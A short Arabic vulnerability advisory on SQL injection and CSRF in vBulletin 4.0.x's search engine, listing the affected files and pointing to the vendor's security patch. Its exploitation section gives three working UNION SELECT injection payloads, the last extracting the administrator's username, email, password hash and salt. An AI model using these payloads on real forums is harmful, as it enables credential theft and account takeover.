مقدمة

تم اكتشاف ثغرة  SQL injection  و CSRF/XSRF في برنامج إدارة المحتوى الشهير Vbuuletin في محرك البحث الخاص به.

معلومات اختبار الاختراق

نظام التشغيل: جميع أنظمة التشغيل

المنصة: PHP , MySQL

معلومات الثغرة:
البرنامج: http://www.vbulletin.com
الإصدار المصاب: 4.0.x
تكمن التغرة في الملفات محرك البحث و هي
“/vb/search/searchtools.php” في السطر 751
“/packages/vbforum/search/type/socialgroup.php” في السطور 201 إلى 203

الاستغلال:
اذهب إلى محرك البحث , ثم إلى “Search Multiple Content Types“ ثم اختر المجموعات “groups“
وضع التالي  في محرك البحث
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

لمزيد من التفاصيل

SQLi

CSRF/XSRF

الحماية:
التحديث الأمني الرسمي من الشركة
vbulletin 4.X Security Batch

تحياتي و احترامي